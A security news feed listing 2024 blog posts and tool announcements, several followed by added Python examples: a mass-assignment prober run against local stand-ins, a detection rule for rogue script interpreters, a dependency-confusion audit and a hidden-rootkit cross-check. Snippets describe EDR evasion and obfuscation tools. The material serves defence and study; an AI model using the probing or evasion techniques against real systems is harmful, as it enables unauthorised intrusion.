Computer viruses are extremely hazardous, which is why it's crucial to secure your devices with reliable malware removal programs. These free applications serve as your second line of defense against...
https://www.hackercombat.com/free-virus-removal/

1-15 July 2024 Cyber Attacks Timeline
In the first timeline of July 2024 I collected 102 events (6.8 events/day) with a threat landscape dominated by ransomware...
https://www.hackmageddon.com/2024/10/10/1-15-july-2024-cyber-attacks-timeline/

Not all types of MFA are created equal...
Our updated multi-factor authentication (MFA) guidance recommends organisations use techniques that give better protection against phishing attacks.
https://www.ncsc.gov.uk/blog-post/not-all-types-mfa-created-equal

Third Annual Ponemon Institute Report: Nearly Seven in 10 Healthcare Organizations Experienced Disruption to Patient Care Due to Cyber Attacks

https://www.proofpoint.com/us/newsroom/press-releases/third-annual-ponemon-institute-report-nearly-seven-10-healthcare

Scalability Challenges in Privacy-Preserving Federated Learning
This post is part of a series on privacy-preserving federated learning. The series is a collaboration between NIST and the UK government's Responsible Technology Adoption Unit (RTA), previously known as the Centre for Data Ethics and Innovation. Learn more and read all the posts published to date at NIST's Privacy Engineering Collaboration Space or RTA's blog. Introduction: in this post, we talk with Dr. Xiaowei Huang and Dr. Yi Dong (University of Liverpool), Dr. Mat Weldon (UK Office of National Statistics (ONS)), and Sikha Pentyala (University of Washington Tacoma), who were winners in the
https://www.nist.gov/blogs/cybersecurity-insights/scalability-challenges-privacy-preserving-federated-learning

Implementing Zero Trust
Zero trust is an adaptable security framework designed to address today's cyber security challenges. It employs microsegmentation and data-centric policies, verifying users, devices and applications irrespective of network location, as well...
https://www.hackercombat.com/zero-trust/

CDK Cyber Attack
This attack had all the hallmarks of a ransomware attack and targeted the CDK Global systems used by auto dealerships to manage sales, finance and service operations. Due to outdated technology, ineffective...
https://www.hackercombat.com/cdk-cyber-attack/

How to talk to board members about cyber
New guidance helps CISOs communicate with Boards to improve oversight of cyber risk.
https://www.ncsc.gov.uk/blog-post/how-to-talk-to-board-members-about-cyber

Engaging with Boards to improve the management of cyber security risk
How to communicate more effectively with board members to improve cyber security decision making.
https://www.ncsc.gov.uk/guidance/board-level-cyber-discussions-communicating-clearly

Effective Fuzzing: A Dav1d Case Study
Guest post by Nick Galloway, Senior Security Engineer, 20% time on Project Zero. Late in 2023, while working on a 20% project with Project Zero, I found an integer overflow in the dav1d AV1 video decoder. That integer overflow leads to an out-of-bounds write to memory. Dav1d 1.4.0 patched this, and it was assigned CVE-2024-1580. After the disclosure, I received some questions about how this issue was discovered, since dav1d is already being fuzzed by at least oss-fuzz. This blog post explains what happened. It's a useful case study in how to construct fuzzers to exercise as much code as possible. But first, some background. Background: Dav1d. Dav1d is a highly-optimized AV1 decoder. AV1 is a royalty-free video coding format developed by the Alliance...
https://googleprojectzero.blogspot.com/2024/10/effective-fuzzing-dav1d-case-study.html

Pixel's Proactive Approach to Security: Addressing Vulnerabilities in Cellular Modems
Posted by Sherk Chung, Stephan Chen, Pixel team, and Roger Piqueras Jover, Ivan Lozano, Android team Pixel phones have earned a well-deserved reputation for being security-conscious. In this blog, we'll take a peek under the hood to see how Pixel mitigates common exploits on cellular basebands. Smartphones have become an integral part of our lives, but few of us think about the complex software that powers them, especially the cellular baseband – the processor on the device responsible for handling all cellular communication (such as LTE, 4G, and 5G). Most smartphones use cellular baseband processors with tight performance constraints, making security hardening difficult. Security researchers have increasingly exploited this attack vector and routinely demonstrated the possibility of...
http://security.googleblog.com/2024/10/pixel-proactive-security-cellular-modems.html

Evaluating Mitigations & Vulnerabilities in Chrome
Posted by Alex Gough, Chrome Security Team The Chrome Security Team is constantly striving to make it safer to browse the web. We invest in mechanisms to make classes of security bugs impossible, mitigations that make it more difficult to exploit a security bug, and sandboxing to reduce the capability exposed by an isolated security issue. When choosing where to invest it is helpful to consider how bad actors find and exploit vulnerabilities. In this post we discuss several axes along which to evaluate the potential harm to users from exploits, and how they apply to the Chrome browser. Historically the Chrome Security Team has made major investments and driven the web to be safer. We pioneered browser sandboxing, site isolation and the migration to an encrypted web. Today we're investing...
http://security.googleblog.com/2024/10/evaluating-mitigations-vulnerabilities.html

Q2 2024 Cyber Attacks Statistics
I aggregated the statistics created from the cyber attacks timelines published in Q2 2024. In this period, I collected 688 events dominated by Cyber Crime with ...
https://www.hackmageddon.com/2024/10/03/q2-2024-cyber-attacks-statistics/

Issue with NVIDIA Container Toolkit (CVE-2024-0132, CVE-2024-0133)
Publication Date: 2024/10/01 6:35 PM PDT. AWS is aware of CVE-2024-0132 and CVE-2024-0133, issues affecting the NVIDIA container toolkit 1.16. At this time, the following services require customer action. If we become aware of additional impact, we will update this bulletin. Amazon Elastic Container Service (Amazon ECS): Amazon ECS has released updated ECS GPU-optimized Amazon Machine Images (AMIs) with the patched NVIDIA container toolkit v1.16.2. We recommend that ECS customers update to these AMIs (or the latest available). Additional information on the ECS-optimized AMI is available in our "Amazon ECS-optimized Linux AMIs" developer guide. Amazon Elastic Kubernetes Service (Amazon EKS): Amazon EKS has released updated EKS GPU-optimized Amazon Machine Images...
https://aws.amazon.com/security/security-bulletins/AWS-2024-010/

Cybersecurity spotlight on bug bounty researcher @imrerad
For this year's Cybersecurity Awareness Month, the GitHub Bug Bounty team is excited to feature another spotlight on a talented security researcher who participates in the GitHub Security Bug Bounty Program: @imrerad!
https://github.blog/security/vulnerability-research/cybersecurity-spotlight-on-bug-bounty-researcher-imrerad/

Lies, damned lies, and Impact Hero (refoorest, allcolibri)
Transparency note: According to Colibri Hero, they attempted to establish a business relationship with eyeo, a company that I co-founded. I haven't been in an active role at eyeo since 2018, and I left the company entirely in 2021. Colibri Hero was only founded in 2021. My investigation here was prompted by a blog comment. Colibri Hero (also known as allcolibri) is a company with a noble mission: We want to create a world where organizations can make a positive impact on people and communities. One of the company's products is the refoorest browser extension, promising to make a positive impact on the climate by planting trees. Best of it: this costs users nothing whatsoever. According to the refoorest website: Plantation financed by our partners So the users merely need to have the...
https://palant.info/2024/10/01/lies-damned-lies-and-impact-hero-refoorest-allcolibri/

June 2024 Cyber Attacks Statistics
After the cyber attacks timelines (part I and part II), it's time to publish the statistics for June 2024 where I collected and analyzed 230 events. During June 2024 Cyber Crime continued to lead...
https://www.hackmageddon.com/2024/10/01/june-2024-cyber-attacks-statistics/

COM Cross-Session Activation
Once again, reading blogs and tweets from James Forshaw led me to wonder how things work. This time, I was working on DCOM for my last blog post and while reading about cross-session activation, I had trouble believing what I was reading.
https://blog.compass-security.com/2024/10/com-cross-session-activation/

16-30 June 2024 Cyber Attacks Timeline
In the second timeline of June 2024, I collected 106 events (7.07 events/day) with a threat landscape dominated by...
https://www.hackmageddon.com/2024/09/26/16-30-june-2024-cyber-attacks-timeline/

Eliminating Memory Safety Vulnerabilities at the Source
Posted by Jeff Vander Stoep - Android team, and Alex Rebert - Security Foundations Memory safety vulnerabilities remain a pervasive threat to software security. At Google, we believe the path to eliminating this class of vulnerabilities at scale and building high-assurance software lies in Safe Coding, a secure-by-design approach that prioritizes transitioning to memory-safe languages. This post demonstrates why focusing on Safe Coding for new code quickly and counterintuitively reduces the overall security risk of a codebase, finally breaking through the stubbornly high plateau of memory safety vulnerabilities and starting an exponential decline, all while being scalable and cost-effective. We'll also share updated data on how the percentage of memory safety vulnerabilities in Android...
http://security.googleblog.com/2024/09/eliminating-memory-safety-vulnerabilities-Android.html

OSINT: User Privacy in Linux
Linux telemetry involves gathering and sending data from a Linux-based system to an external server or service. The purpose of this process is often to...
https://www.hackingarticles.in/osint-user-privacy-in-linux/

Google & Arm - Raising The Bar on GPU Security
Posted by Xuan Xing, Eugene Rodionov, Jon Bottarini, Adam Bacchus - Android Red Team; Amit Chaudhary, Lyndon Fawcett, Joseph Artgole - Arm Product Security Team Who cares about GPUs? You, me, and the entire ecosystem! GPUs (graphics processing units) are critical in delivering rich visual experiences on mobile devices. However, the GPU software and firmware stack has become a way for attackers to gain permissions and entitlements (privilege escalation) to Android-based devices. There are plenty of issues in this category that can affect all major GPU brands, for example, CVE-2023-4295, CVE-2023-21106, CVE-2021-0884, and more. Most exploitable GPU vulnerabilities are in the implementation of the GPU kernel mode modules. These modules are pieces of code that load/unload during runtime,...
http://security.googleblog.com/2024/09/google-arm-raising-bar-on-gpu-security.html

SafeLine - Serve As A Reverse Proxy To Protect Your Web Services From Attacks And Exploits
SafeLine is a self-hosted WAF (Web Application Firewall) that protects your web apps from attacks and exploits. A web application firewall protects web apps by filtering and monitoring HTTP traffic between a web application and the Internet. It typically protects against attacks such as SQL injection, XSS, code injection, OS command injection, CRLF injection, LDAP injection, XPath injection, RCE, XXE, SSRF, path traversal, backdoors, brute force, HTTP floods and bot abuse, among others. How it works: by deploying a WAF in front of a web application, a shield is placed between the web application and the Internet. While a proxy server protects a client machine's identity by using an intermediary, a WAF is a type of reverse proxy, protecting the server from exposure by having clients pass...
http://www.kitploit.com/2024/09/safeline-serve-as-reverse-proxy-to.html

PolyDrop - A BYOSI (Bring-Your-Own-Script-Interpreter) Rapid Payload Deployment Toolkit
BYOSI (Bring-Your-Own-Script-Interpreter): by abusing trusted applications, one can deliver a compatible script interpreter for a Windows, Mac or Linux system together with malicious source code written for that interpreter. Once both the malicious source code and the trusted script interpreter are written to the target system, the source code is simply executed via the trusted interpreter. PolyDrop leverages thirteen scripting languages to perform this attack. The following languages are wholly ignored by AV vendors including MS-Defender: tcl, php, crystal, julia, golang, dart, dlang, vlang, nodejs, bun, python, fsharp and deno. All of these languages were allowed to completely execute, and...
http://www.kitploit.com/2024/09/polydrop-byosi-bring-your-own-script.html

Secator - The Pentester's Swiss Knife
secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and is designed to improve productivity for pentesters and security researchers.
Features:
- Curated list of commands
- Unified input options
- Unified output schema
- CLI and library usage
- Distributed options with Celery
- Complexity from simple tasks to complex workflows
- Customizable
Supported tools (name: description [category]):
- httpx: Fast HTTP prober [http]
- cariddi: Fast crawler and endpoint secrets / API keys / tokens matcher [http/crawler]
- gau: Offline URL crawler (AlienVault, the Wayback Machine, Common Crawl, URLScan) [http/crawler]
- gospider: Fast web spider written in Go [http/crawler]
- katana: Next-generation crawling...
http://www.kitploit.com/2024/09/secator-pentesters-swiss-knife.html

Damn-Vulnerable-Drone - An Intentionally Vulnerable Drone Hacking Simulator Based On The Popular ArduPilot/MAVLink Architecture, Providing A Realistic Environment For Hands-On Drone Hacking
The Damn Vulnerable Drone is an intentionally vulnerable drone hacking simulator based on the popular ArduPilot/MAVLink architecture, providing a realistic environment for hands-on drone hacking. What is the Damn Vulnerable Drone? It is a virtually simulated environment designed for offensive security professionals to safely learn and practice drone hacking techniques. It simulates real-world ArduPilot and MAVLink drone architectures and vulnerabilities, offering hands-on experience in exploiting drone systems. Why was it built? The Damn Vulnerable Drone aims to enhance offensive security skills within a controlled environment, making it a valuable tool for intermediate-level security professionals, pentesters and hacking enthusiasts....
http://www.kitploit.com/2024/09/damn-vulnerable-drone-intentionally.html

File-Unpumper - Tool That Can Be Used To Trim Useless Things From A PE File Such As The Things A File Pumper Would Add
file-unpumper is a command-line utility for cleaning and analyzing Portable Executable (PE) files. It provides a range of features to help developers and security professionals work with PE files more effectively.
Features:
- PE header fixing: file-unpumper can fix and align the PE headers of a given executable. This is particularly useful for resolving issues caused by packers or obfuscators that modify the headers.
- Resource extraction: the tool can extract embedded resources from a PE file, such as icons, bitmaps or other data resources, which helps when reverse engineering or analyzing the contents of an executable.
- Metadata analysis: file-unpumper provides a comprehensive analysis of the PE file's metadata, including information about the machine...
http://www.kitploit.com/2024/09/file-unpumper-tool-that-can-be-used-to.html

Managing Cybersecurity and Privacy Risks in the Age of Artificial Intelligence: Launching a New Program at NIST
The rapid proliferation of Artificial Intelligence (AI) promises significant value for industry, consumers, and broader society, but as with many technologies, new risks from these advancements in AI must be managed to realize its full potential. The NIST AI Risk Management Framework (AI RMF) was developed to manage the benefits and risks to individuals, organizations, and society associated with AI and covers a wide range of risks, from safety to lack of transparency and accountability. For those of us at NIST working in cybersecurity, privacy and AI, a key concern is how advancements
https://www.nist.gov/blogs/cybersecurity-insights/managing-cybersecurity-and-privacy-risks-age-artificial-intelligence

Mass-Assigner - Simple Tool Made To Probe For Mass Assignment Vulnerability Through JSON Field Modification In HTTP Requests
Mass Assigner is a tool for identifying and exploiting mass assignment vulnerabilities in web applications. It first retrieves data from a specified request, such as a user profile fetch, then systematically attempts to apply each parameter extracted from that response to a second, user-supplied request, one parameter at a time. This allows automated testing and exploitation of potential mass assignment vulnerabilities. Disclaimer: this tool actively modifies server-side data; make sure you have proper authorization before use. Any unauthorized or illegal activity using this tool is entirely at your own risk. Features: custom headers in requests; customization of the HTTP method for both the origin and...
http://www.kitploit.com/2024/09/mass-assigner-simple-tool-made-to-probe.html
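The probing loop the description above outlines, as an added example that is not the tool's own code: two in-memory stand-ins for the read and update requests (one binding every JSON field onto the record, one binding only an allow-list), and a prober that tests one field at a time and restores what it changed. The record and its field names are hypothetical.

```python
import copy

# Constructed in-memory stand-ins for the two HTTP requests the tool needs: a read of
# the profile and an update of it.  The record and its field names are hypothetical.


def make_service(bind):
    """Return (get_profile, update_profile) over a private record; `bind` decides
    which JSON fields an update may write."""
    db = {"42": {"id": 42, "email": "alice@example.com", "role": "user", "credits": 10}}

    def get_profile(uid):
        return dict(db[uid])

    def update_profile(uid, body):
        db[uid].update(bind(body))
        return dict(db[uid])

    return get_profile, update_profile


def bind_everything(body):
    """Vulnerable: whatever the client sends is written to the record."""
    return dict(body)


def bind_allowlisted(body, allowed=frozenset({"email"})):
    """Hardened: only the fields the user is meant to edit are written."""
    return {k: v for k, v in body.items() if k in allowed}


def mutate(value):
    """Produce a different value of the same type so a successful write is observable."""
    if isinstance(value, bool):
        return not value
    if isinstance(value, int):
        return value + 1
    if isinstance(value, str):
        return value + ".probe"
    return value


def probe_mass_assignment(get_profile, update_profile, uid):
    """For each field of the read response, send it alone with a changed value to the
    update request and re-read to see whether the server bound it.  Fields found
    writable are restored to their original value afterwards."""
    baseline = copy.deepcopy(get_profile(uid))
    writable = []
    for field, original in baseline.items():
        probe = {field: mutate(original)}
        update_profile(uid, probe)
        if get_profile(uid).get(field) == probe[field]:
            writable.append(field)
            update_profile(uid, {field: original})   # restore: the field is writable
    return writable


if __name__ == "__main__":
    for name, bind in (("vulnerable", bind_everything), ("hardened", bind_allowlisted)):
        get_p, upd = make_service(bind)
        print(f"{name}: writable via update = {probe_mass_assignment(get_p, upd, '42')}")
```

Against the vulnerable binder every field comes back writable, including `id`, `role` and `credits`; against the allow-listed binder only `email` does. Restoring through the same update call only works because the field was just shown to be writable, which is also why the tool's disclaimer about modifying server-side data matters: a probe that crashes halfway leaves mutated values behind.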

A Single IP is Scanning Intensely, and Yields a List of Malware Loaders
Overall scanning for CVEs we track is down, but one specific scanner caught our attention. We dig into what it’s doing.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024

Imperius - Make A Linux Kernel Rootkit Visible Again
Imperius makes an LKM rootkit visible again. The tool is part of research on LKM rootkits that will be published. It works by obtaining the memory address of a rootkit's "show_module" function, for example, and calling it, which adds the module back to lsmod so that the rootkit can be removed. On recent kernels the function address can be read from /sys/kernel/tracing/available_filter_functions_addrs, but that file is only available from kernel 6.5 onwards. The alternative is to scan kernel memory for the function, then add the module back to lsmod so it can be removed. In short, this LKM abuses the feature of LKM rootkits that lets them become visible again. Note: there is another trick for removing/defusing an LKM rootkit, but it will be in the research that will...
http://www.kitploit.com/2024/09/imperius-make-linux-kernel-rootkit.html

Three-Headed Potato Dog
Earlier this year, several security researchers published research about using DCOM to coerce Windows systems into authenticating to other systems. This can be misused to relay the NTLM or Kerberos authentication, for instance to AD CS over HTTP. This sounds like a hot and complex topic. Let's take a look back at how this started [...]
https://blog.compass-security.com/2024/09/three-headed-potato-dog/

BYOSI - Evade EDRs The Simple Way, By Not Touching Any Of The APIs They Hook
Evade EDRs the simple way, by not touching any of the APIs they hook. Theory: most EDRs fail to scan scripting files, treating them merely as text files. While this is unfortunate for them, it is an opportunity for us. Flashy methods like residing in memory or thread injection are heavily monitored, and without a binary signed by a valid Certificate Authority, execution is nearly impossible. Enter BYOSI (Bring Your Own Scripting Interpreter): every scripting interpreter is signed by its creator, with a valid certificate. Testing in a live environment revealed surprising results: a heavily signatured PHP script from this repository not only ran on systems monitored by CrowdStrike and Trellix but also established an external connection without triggering...
http://www.kitploit.com/2024/09/byosi-evade-edrs-simple-way-by-not.html
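Detection logic for the BYOSI and PolyDrop technique described above, as an added example that is not part of either project: since the dropped interpreter is legitimately signed, signature checks are no help, so the rule keys on a known interpreter binary running from a path outside the sanctioned install roots and escalates when that same process opens an outbound connection. The Sysmon-style events, the interpreter binary names and the trusted roots are constructed assumptions.

```python
import ntpath

# Constructed Sysmon-style events (EventID 1 = process create, 3 = network connect);
# not real telemetry.  Paths, PIDs and destination addresses are hypothetical.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\bob\AppData\Local\Temp\php\php.exe",
     "CommandLine": r"php.exe C:\Users\bob\AppData\Local\Temp\stage.php"},
    {"EventID": 3, "ProcessId": 4120, "Image": r"C:\Users\bob\AppData\Local\Temp\php\php.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 1, "ProcessId": 5200, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Program Files\nodejs\node.exe", "CommandLine": "node.exe build.js"},
    {"EventID": 3, "ProcessId": 5200, "Image": r"C:\Program Files\nodejs\node.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
    {"EventID": 1, "ProcessId": 6100, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\bob\Downloads\julia\bin\julia.exe", "CommandLine": "julia.exe -e 1+1"},
]

# Assumption: Windows binary names for the interpreters the PolyDrop entry lists.
INTERPRETERS = {"php.exe", "node.exe", "bun.exe", "deno.exe", "python.exe", "julia.exe",
                "dart.exe", "tclsh.exe", "crystal.exe", "go.exe", "dmd.exe", "v.exe",
                "dotnet.exe"}
# Assumption: sanctioned installs live under these roots; anything else is treated as
# user-writable (Temp, Downloads, AppData, ...).
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")


def is_rogue_interpreter(image):
    """A known interpreter binary running from outside the sanctioned install roots."""
    p = image.lower()
    return ntpath.basename(p) in INTERPRETERS and not p.startswith(TRUSTED_ROOTS)


def detect_byosi(events):
    """Alert on rogue interpreters; raise the severity when the same process then
    opens an outbound connection (the 'external connection' the entry describes)."""
    alerts = {}
    for ev in events:
        if ev["EventID"] == 1 and is_rogue_interpreter(ev["Image"]):
            alerts[ev["ProcessId"]] = {"image": ev["Image"], "cmd": ev["CommandLine"],
                                       "severity": "medium", "network": None}
        elif ev["EventID"] == 3 and ev["ProcessId"] in alerts:
            alert = alerts[ev["ProcessId"]]
            alert["severity"] = "high"
            alert["network"] = f'{ev["DestinationIp"]}:{ev["DestinationPort"]}'
    return alerts


if __name__ == "__main__":
    for pid, alert in detect_byosi(SAMPLE_EVENTS).items():
        print(f"pid {pid} [{alert['severity']}] {alert['image']} -> {alert['network']}")
```

Correlating on the numeric PID is fine for a batch of sample events; on a live pipeline use Sysmon's ProcessGuid, since PIDs are reused. The path check is deliberately crude: the point is that an interpreter that is "allowed" by signature still has no business running out of a user's Temp or Downloads directory.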

Psobf - PowerShell Obfuscator
Tool for obfuscating PowerShell scripts, written in Go. Its main objective is to obfuscate PowerShell code to make analysis and detection more difficult. It offers 5 levels of obfuscation, from basic obfuscation to script fragmentation, so users can tailor the obfuscation level to their specific needs. Usage: ./psobf -h ...
http://www.kitploit.com/2024/09/psobf-powershell-obfuscator.html

CloudImposer
Google Cloud Composer is a managed service for Apache Airflow. Tenable discovered that the Cloud Composer package was vulnerable to dependency confusion, which could have allowed attackers to inject malicious code when the package was compiled from source. This could have led to remote code execution on machines running Cloud Composer, which include various other GCP services as well as internal servers at Google. The dependency confusion stemmed from Google's risky recommendation in their documentation to use the --extra-index-url argument when installing private Python packages. Following disclosure, Google fixed the dependency confusion vulnerability and also updated their documentation.
https://www.cloudvulndb.org/cloudimposer-gcp
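An added example, not Tenable's or Google's code: a small audit of a pip requirements file for the two conditions that make this kind of dependency confusion possible, plus a function that mirrors how pip picks a candidate once `--extra-index-url` has merged a private index with PyPI. The requirements text, the private index host and the `acme-` prefix for internal package names are constructed assumptions.

```python
import re

# Constructed requirements file (not the Cloud Composer one).  The private index
# host and the "acme-" naming prefix for internal packages are assumptions.
SAMPLE_REQUIREMENTS = """\
--extra-index-url https://pypi.internal.example/simple
requests==2.32.3
acme-utils>=1.2
acme-auth==1.0.0 \\
    --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
"""


def parse_version(v):
    return tuple(int(p) for p in v.split("."))


def resolve_like_pip(candidates):
    """candidates: {index_url: [versions]}.  With --extra-index-url pip treats every
    index as equal and installs the highest version wherever it comes from, which is
    what lets a public package with the same name hijack a private one."""
    best = None
    for index, versions in candidates.items():
        for v in versions:
            if best is None or parse_version(v) > parse_version(best[1]):
                best = (index, v)
    return best


_REQ = re.compile(r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)\s*"
                  r"(?P<spec>(==|~=|!=|<=|>=|<|>)\S*)?")


def audit_requirements(text, private_prefixes=("acme-",)):
    """Flag a secondary index merged with the public one, and private packages that
    are neither pinned nor hash-checked (so any newer upstream name would win)."""
    findings = []
    for raw in text.replace("\\\n", " ").splitlines():   # join line continuations
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("--extra-index-url"):
            findings.append(f"extra index merged with PyPI: {line}")
            continue
        if line.startswith("-"):          # other pip options (--index-url, -r, ...)
            continue
        m = _REQ.match(line)
        if not m:
            continue
        name, spec = m["name"].lower(), m["spec"] or ""
        if not name.startswith(private_prefixes):
            continue
        if not spec.startswith("=="):
            findings.append(f"{name}: private package not pinned with ==")
        if "--hash=" not in line:
            findings.append(f"{name}: private package has no --hash")
    return findings


if __name__ == "__main__":
    for f in audit_requirements(SAMPLE_REQUIREMENTS):
        print("finding:", f)
    print("pip would install:", resolve_like_pip({
        "https://pypi.internal.example/simple": ["1.2.0", "1.3.0"],
        "https://pypi.org/simple": ["99.0.0"],            # squatter's upload
    }))
```

The safer shapes are the ones Google's updated documentation points towards: a single `--index-url` at a private index that proxies PyPI (so there is one namespace to resolve against), and `==` pins with `--hash` for anything internal, which make a substituted upstream artifact fail the install rather than run.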

Document AI data exfiltration
The Document AI service unintentionally allows users to read any Cloud Storage object in the same project, in a way that isn't properly documented. The Document AI service agent is auto-assigned with excessive permissions, allowing it to access all objects from Cloud Storage buckets in the same project. Malicious actors can exploit this to exfiltrate data from Cloud Storage by indirectly leveraging the service agent's permissions. This vulnerability is an instance of transitive access abuse, a class of security flaw where unauthorized access is gained indirectly through a trusted intermediary.
https://www.cloudvulndb.org/gcp-document-ai-data-exfil

ModTracer - Finds Hidden Linux Kernel Rootkits And Makes Them Visible Again
ModTracer finds hidden Linux kernel rootkits and makes them visible again. Another way to make an LKM visible is the Imperius trick: https://github.com/MatheuZSecurity/Imperius
http://www.kitploit.com/2024/09/modtracer-modtracer-finds-hidden-linux.html
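An added example covering both the ModTracer and Imperius entries, written for this page rather than taken from either project: a userland cross-check that flags modules still present in sysfs or in ftrace's function list but missing from /proc/modules, and that pulls a hidden module's function addresses (such as its show_module symbol) from available_filter_functions_addrs when the kernel provides that file. The sample /proc/modules, sysfs and ftrace contents and the evil_lkm module name are constructed.

```python
import os
import re

# Constructed samples (not from a real host).  The line layout "<addr> <symbol> [module]"
# is what available_filter_functions_addrs prints on kernels that have it (6.5+);
# the module name "evil_lkm" and its symbols are hypothetical.
SAMPLE_PROC_MODULES = """\
ext4 933888 2 - Live 0xffffffffc0b00000
xfs 1875968 0 - Live 0xffffffffc0900000
"""
SAMPLE_SYSFS_MODULES = {"ext4", "xfs", "evil_lkm"}      # entries carrying an initstate file
SAMPLE_FTRACE_ADDRS = """\
ffffffffc0b01000 ext4_file_open [ext4]
ffffffffc0901000 xfs_file_open [xfs]
ffffffffc0d00100 hide_module [evil_lkm]
ffffffffc0d00200 show_module [evil_lkm]
"""


def parse_proc_modules(text):
    """/proc/modules lines start with the module name; that is what lsmod shows."""
    return {line.split()[0] for line in text.splitlines() if line.strip()}


def loaded_modules_in_sysfs(root="/sys/module"):
    """Loadable modules keep a /sys/module/<name>/initstate entry even after a rootkit
    unlinks itself from the module list; built-in modules have no initstate file."""
    return {n for n in os.listdir(root)
            if os.path.exists(os.path.join(root, n, "initstate"))}


_FTRACE_LINE = re.compile(r"^([0-9a-f]+)\s+(\S+)\s+\[(\S+)\]")


def parse_ftrace_addrs(text):
    """Map module name -> {symbol: address} from available_filter_functions_addrs.
    Only functions belonging to loadable modules carry the [module] suffix."""
    mods = {}
    for line in text.splitlines():
        m = _FTRACE_LINE.match(line)
        if m:
            mods.setdefault(m.group(3), {})[m.group(2)] = int(m.group(1), 16)
    return mods


def find_hidden_modules(proc_names, sysfs_names, ftrace_mods):
    """Anything present in sysfs or in ftrace's function list but absent from
    /proc/modules has been unlinked from the module list, i.e. hidden."""
    seen_elsewhere = set(sysfs_names) | set(ftrace_mods)
    return sorted(seen_elsewhere - set(proc_names))


def scan_live(ftrace_path="/sys/kernel/tracing/available_filter_functions_addrs"):
    """Run the cross-check on this host; returns {hidden_module: {symbol: addr}}."""
    with open("/proc/modules") as fh:
        proc = parse_proc_modules(fh.read())
    ftrace = {}
    if os.path.exists(ftrace_path):            # kernel 6.5+ only, needs root
        with open(ftrace_path) as fh:
            ftrace = parse_ftrace_addrs(fh.read())
    hidden = find_hidden_modules(proc, loaded_modules_in_sysfs(), ftrace)
    return {name: ftrace.get(name, {}) for name in hidden}


if __name__ == "__main__":
    ftrace = parse_ftrace_addrs(SAMPLE_FTRACE_ADDRS)
    for name in find_hidden_modules(parse_proc_modules(SAMPLE_PROC_MODULES),
                                    SAMPLE_SYSFS_MODULES, ftrace):
        print(name, {s: hex(a) for s, a in ftrace.get(name, {}).items()})
```

This is the cheap first pass: a rootkit that only deletes itself from the module list is caught by either source, and the ftrace path also hands you the address of its show_module function, which is what Imperius calls to put the module back into lsmod. A rootkit that additionally removes its sysfs kobject and unregisters from ftrace evades both checks, which is why the Imperius entry falls back to scanning kernel memory.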

DockerSpy - DockerSpy Searches For Images On Docker Hub And Extracts Sensitive Information Such As Authentication Secrets, Private Keys, And More
DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. What is Docker? Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed. About Docker Hub: Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access...
http://www.kitploit.com/2024/09/dockerspy-dockerspy-searches-for-images.html

A new path for Kyber on the web
Posted by David Adrian, David Benjamin, Bob Beck & Devon O'Brien, Chrome Team We previously posted about experimenting with a hybrid post-quantum key exchange, and enabling it for 100% of Chrome Desktop clients. The hybrid key exchange used both the pre-quantum X25519 algorithm, and the new post-quantum algorithm Kyber. At the time, the NIST standardization process for Kyber had not yet finished. Since then, the Kyber algorithm has been standardized with minor technical changes and renamed to the Module Lattice Key Encapsulation Mechanism (ML-KEM). We have implemented ML-KEM in Google's cryptography library, BoringSSL, which allows for it to be deployed and utilized by services that depend on this library. The changes to the final version of ML-KEM make it incompatible with the previously...
http://security.googleblog.com/2024/09/a-new-path-for-kyber-on-web.html

1-15 June 2024 Cyber Attacks Timeline
In the first timeline of June 2024 I collected 124 events (8.27 events/day) with a threat landscape dominated by...
https://www.hackmageddon.com/2024/09/12/1-15-june-2024-cyber-attacks-timeline/

A Detailed Guide on Feroxbuster
Feroxbuster is a robust tool designed to identify directories and files on web servers using brute-force techniques. It is frequently utilized in penetration testing and...
https://www.hackingarticles.in/a-detailed-guide-on-feroxbuster/

5 Ways to Mitigate Risk in Cybersecurity
Cybersecurity refers to practices designed to defend computers, mobile devices, electronic data storage platforms and networks against attacks such as ransomware extortion and data breaches. Preventative techniques are key in...
https://www.hackercombat.com/five-ways-to-mitigate-risk-in-cybersecurity/

What is Malware
Malware refers to any form of malicious software which aims to disrupt, harm or steal private information for criminal use. Furthermore, malware can mine cryptocurrency for cybercriminals as an additional...
https://www.hackercombat.com/malware/

From Classroom into Bug Bounty: Investigating Motivational Factors Among Swiss Students
Bug bounty programs have evolved into a critical element of modern cybersecurity. In this post, we give some answers to how bug bounty programs can attract students as hunters.
https://blog.compass-security.com/2024/09/from-classroom-into-bug-bounty-investigating-motivational-factors-among-swiss-students/

How to Identify and Stop Scrapers
Fighting sophisticated scrapers requires advanced detection methods. Discover the techniques needed to identify and manage these hidden threats outlined in our investigation.
https://www.f5.com/labs/articles/threat-intelligence/how-to-identify-and-stop-scrapers

ClamAV 1.4.1, 1.3.2, 1.0.7, and 0.103.12 security patch versions published
Today, we are publishing the 1.4.1, 1.3.2, 1.0.7, and 0.103.12 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and (with the exception of 0.103.12) through Docker Hub. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version. 1.4.1: ClamAV 1.4.1 is a critical patch release with the following fixes: CVE-2024-20506: changed the logging module to disable following symlinks on Linux and Unix systems, so as to prevent an attacker with existing access to the 'clamd' or 'freshclam' services from using a symlink to corrupt system files. This issue affects all currently supported versions. It will be fixed in 1.4.1, 1.3.2, 1.0.7 and 0.103.12. Thank...
http://blog.clamav.net/2024/09/clamav-141-132-107-and-010312-security.html

